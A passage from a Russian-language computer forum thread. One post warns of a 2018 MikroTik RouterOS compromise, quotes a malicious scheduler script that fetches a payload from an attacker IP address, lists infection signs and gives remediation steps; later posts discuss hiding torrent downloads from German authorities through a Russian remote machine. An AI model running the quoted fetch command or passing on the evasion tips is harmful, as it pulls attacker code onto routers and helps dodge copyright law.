Серый Хомячок

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Добро пожаловать, Гость
Пожалуйста Вход или Регистрация.    Забыли пароль?

Общая тема на поболтать о компах с пользой
(1 чел.) (1) Гость
Всякое про компьютеры.
ВнизСтраница: 1...1213141516171819
Сообщения темы: Общая тема на поболтать о компах с пользой
#19968
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес., 3 нед. назад  
Уязвимости MikroTik
К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.



Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.
 
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#19969
ottisk
Тайна Третьей планеты
Пользователь в онлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Страна, город: Петропавловск-Камчатский День рождения: 11/16
Общая тема на поболтать о компах с пользой 2 мес., 3 нед. назад  
А если просто сбросить на заводские настройки физической кнопкой reset?
 
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#19970
GREY
Новичок
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Серый Хомячoк Страна, город: Латвия, Рига День рождения: 03/27
Общая тема на поболтать о компах с пользой 2 мес., 3 нед. назад  
Леша, это хрень полная: должен быть открыт наружу порт для ВинБокса, что бы пустить заразу. Не для определенных ай-пи, не для доверенных сетей, а тупо для всех. Не, это нехорошо, получилось, но каким отбитым должен быть админ, что бы администрировать снаружи с любого места?
(голосом либерала-белогандонника)Как известно всем, удаленное управление маршрутами и правами доступа - к дальней дороге.
 
Последнее редактирование: 15.09.2018 09:17 Редактировал GREY.
Сергей
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#19971
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес., 3 нед. назад  
Я не знаю. Для вас, как для любителей Микротика, скопипастил
 
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20043
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес., 1 нед. назад  
Вот вопрос!


Есть комп на территории РФ, со статическим IP, с доступом через RDP.

Есть человек, проживающий в ФРГ, где злобно дрючат за просто даже хождение на торрент-сервера, типа Рутрекера.


А вот используя RDP, качать на комп в РФ программки и потом простым копированием копировать его на комп в Гермашке - это как то покарается?
Отследится роль удаленного компа и а-я-яйный контент как то?
 
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20044
GREY
Новичок
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Серый Хомячoк Страна, город: Латвия, Рига День рождения: 03/27
Общая тема на поболтать о компах с пользой 2 мес., 1 нед. назад  
Леша, все проще: ходить на трекер через ХТТПС, качать только с шифрованием. И никто никого не вздрючит.

Если хочется извращений, то: в России ставим Трансмишн, а управляем оным из Германии. Забираем через ФТПС.

В твоей схеме копирование нешифрованного контента = залет.
 
Сергей
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20045
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес., 1 нед. назад  
На РФ стороне поднять FTP сервер и фсьо?

Я туповат - разложи по полочкам плз
 
Последнее редактирование: 09.08.2018 13:13 Редактировал Ulis.
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20046
GREY
Новичок
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Серый Хомячoк Страна, город: Латвия, Рига День рождения: 03/27
Общая тема на поболтать о компах с пользой 2 мес., 1 нед. назад  
Ulis писал(а):
На РФ стороне поднять FTP сервер и фсьо?

Я туповат - разложи по полочкам плз
На россиской стороне:
1. Консольный торрент клиент Transmision. Им можно управлять удалённо, а можно просто закидывать торрент файлы в директорию и он их будет подхватывать.
2.Наладить какой то транспорт к клиенту, может просто подключить как сетевой диск, если канал позволяет, и смотреть прямо с диска в России. Или наладить тоннель. Или поднять ftpS. Последняя буква о том, что контент передается зашифрованным. Не знаю как сделать точно, но как то сделать.
Дрочиво с 3даленным рабочим столом - кака.
 
Сергей
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20047
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес., 1 нед. назад  
Спасиб. Подумаем ))
 
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20048
Общая тема на поболтать о компах с пользой 2 мес., 1 нед. назад  
Купить VPN и через него все делать никак? Или проксю купить
nordvpn.com/ru/tutorials/socks5/utorrent/
 
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20049
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес., 1 нед. назад  
Хотелось бы халявы ))
 
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20075
Общая тема на поболтать о компах с пользой 2 мес. назад  
Если халява, то поднимаешь на своем компе socks проксю, раздаешь доступ страждущим... и ждать гостей из фсб
Если без приколов, то насколько сие действие тянет и какие законы нарушает лучше у юристов спросить, я не интересовался за ненадобностью.
 
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20076
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес. назад  
Да, понятно.
 
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20077
GREY
Новичок
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Серый Хомячoк Страна, город: Латвия, Рига День рождения: 03/27
Общая тема на поболтать о компах с пользой 2 мес. назад  
Как то вас там запугали страшно. Я все с шифрованием качаю, правда у меня оно на месте не сохраняется - посмотрел и и само стерлось.
 
Сергей
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20078
Ulis
А вот и я! (с)
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Piter День рождения: 03/12
Общая тема на поболтать о компах с пользой 2 мес. назад  
Я вот читаю форумы фашистские на эту тему. Говорят, что качать не возбраняется, а вот раздавать низзя абсолютно.
Но пока читаю. Может и сам закон почитать ))
 
«Умные нам не надобны. Надобны верные» (с)
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20220
GREY
Новичок
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Серый Хомячoк Страна, город: Латвия, Рига День рождения: 03/27
Общая тема на поболтать о компах с пользой 1 мес. назад  
А вот такой вопрос: хочу купить новый комп, но так, чтобы Вин7 поддерживалась, можно было у кетайсев купить зион, а ещё что бы грузился с PCI или М2. Какой мазер купить? Может кто-то уже решал данный квест.
 
Сергей
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20445
GREY
Новичок
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Серый Хомячoк Страна, город: Латвия, Рига День рождения: 03/27
Общая тема на поболтать о компах с пользой 2 д., 3 ч. назад  
Блок питания рутера словил на2.71бня. Ну дома то ничего похожего нету, хнык! Почесал во лбу и приделал.... батарейку от шуруповерта. Интересно, на сколько хватит.
 
Сергей
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
#20448
GREY
Новичок
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Серый Хомячoк Страна, город: Латвия, Рига День рождения: 03/27
Общая тема на поболтать о компах с пользой 5 ч., 41 мин. назад  
Блина, я очень хочу такую штуку! Отговорите, а! Дорого, блин, жалко денег, отговорите!

www.3dconnexion.eu/spacemouse_wireless/eu/
 
Сергей
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
ВверхСтраница: 1...1213141516171819
mod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_counter
Сейчас 57 гостей и 2 пользователей онлайн
Просмотры материалов : 1552617
Разработано "Marine Standard" SIA © 2009